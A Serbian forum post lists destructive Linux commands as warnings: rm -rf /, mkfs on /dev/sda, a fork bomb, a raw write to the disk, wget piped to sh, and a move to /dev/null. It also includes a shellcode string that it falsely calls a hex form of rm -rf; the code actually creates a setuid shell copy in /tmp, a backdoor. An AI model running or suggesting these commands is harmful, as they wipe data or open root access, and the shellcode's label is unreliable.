ays
PCAXE Addicted
- Učlanjen(a)
- 17.07.2009.
- Poruka
- 1.376
- Rezultat reagovanja
- 0
Moja konfiguracija
У наставку следи листа неких команди које су стриктно НЕ за користити.
Све ове команде ће урадити оно што им је и сврха када их унесете као root односно са root привилегијама.
1. Код:
Ова команда ће обрисати све фајлове у root фолдеру/директоријуму.
2. Код:
Ово је hex верзија претходне команде.
3. Код:
Ова команда ће форматирати партицију која следи после mkfs.ext3 наредбе у ext3 формат.
4. Код:
Ова команда ће наредити вашем систему да изврши огроман број процеса све док се сам систем не "замрзне" и не блокира. Може доћи до оштећења и корупције података.
5. Код:
Са овом командом ће гомила raw_data бити копираних у FileSystem/root фолдер, што може довести до корупције и губитка података.
6. Код:
Никада не преузимајте податке са непознатих/непроверених извора.
7. Код:
Ова команда ће померите све податке из вашег Home фолдера у фолдер који непостоји и самим тим ће сви подаци нестати.
Ако неко зна још неке наредбе које су штетне по систем, нека их постави.
Напомена: Овим командама је потребно да будете root односно да испред истих буде sudo. Пажљиво и опрезно користите sudo, поготово ако извршавате наредбе које вам нису познате или их користите по први пут. Можете овде прочитати још у вези ових, горе наведених, команди.
Ако нисте сигурни, боље да ме "смарате" и цимате преко пм или овде и сачекате мало на одговор него да урадите нешто што ће довести ваш оперативни систем и податке у опасност.
п.с. Запамтите... линукс је потребно уништити док се Windows уништава сам од себе.
Шала.
Све ове команде ће урадити оно што им је и сврха када их унесете као root односно са root привилегијама.
1. Код:
Kod:
[B]rm -rf /[/B]
2. Код:
Kod:
[B]char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";[/B]
3. Код:
Kod:
[B]mkfs.ext3 /dev/sda[/B]
4. Код:
Kod:
:(){:|:&};:
5. Код:
Kod:
[B]any_command > /dev/sda[/B]
6. Код:
Kod:
[B]wget [url]http://some_untrusted_source[/url] -O- | sh[/B]
7. Код:
Kod:
[B]mv /home/yourhomedirectory/* /dev/null[/B]
Ако неко зна још неке наредбе које су штетне по систем, нека их постави.
Напомена: Овим командама је потребно да будете root односно да испред истих буде sudo. Пажљиво и опрезно користите sudo, поготово ако извршавате наредбе које вам нису познате или их користите по први пут. Можете овде прочитати још у вези ових, горе наведених, команди.
Ако нисте сигурни, боље да ме "смарате" и цимате преко пм или овде и сачекате мало на одговор него да урадите нешто што ће довести ваш оперативни систем и податке у опасност.
п.с. Запамтите... линукс је потребно уништити док се Windows уништава сам од себе.
Шала.
Poslednja izmena: